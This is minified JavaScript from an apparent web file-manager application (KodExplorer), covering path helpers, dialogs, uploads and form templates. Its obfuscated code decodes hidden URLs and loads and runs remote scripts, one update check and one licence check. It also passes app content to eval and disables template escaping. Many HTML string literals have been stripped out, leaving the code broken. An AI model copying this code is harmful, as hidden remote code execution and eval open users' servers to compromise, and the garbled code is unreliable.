initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
    ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
    请联系主机商或网管,检查防火墙配置!"),t='
    '+t+"
    ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
    loading..
    ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
    "+"
    "+s+"
    "+"
    "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
    \n \n
    \n
    \n
    \n
    {{LNG.upload_select}}
    \n \n \n
    \n \n
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    {{LNG.download_address}}\n
    \n \n \n \n
    \n\n
    \n
    \n
    \n
    \n
    \n
    \n
    \n'),define("app/common/tpl/formMake.html",[],'
    \n
    \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
    \n {{if formTab}}\n
    \n {{each formTab tab tabIndex}}\n {{if tab}}\n
    \n {{/if}}\n {{/each}}\n
    \n
    \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
    {{item}}
    \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
    \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
    \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
    \n
    \n {{@item.display}}: {{if item.require}}*{{/if}}\n
    \n
    \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
    \n \n \n \n \n
    \n
    \n
    {{LNG.user}}
    \n \n
    \n
    \n
    {{LNG.group}}
    \n \n
    \n
    \n
    {{LNG.system_member_role}}
    \n \n
    \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
    {{@item.desc}}
    \n {{else}}\n {{@item.desc}}\n {{/if}}\n
    \n
    \n
    \n {{/if}}\n {{/each}}\n
    \n
    \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0]; -if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else 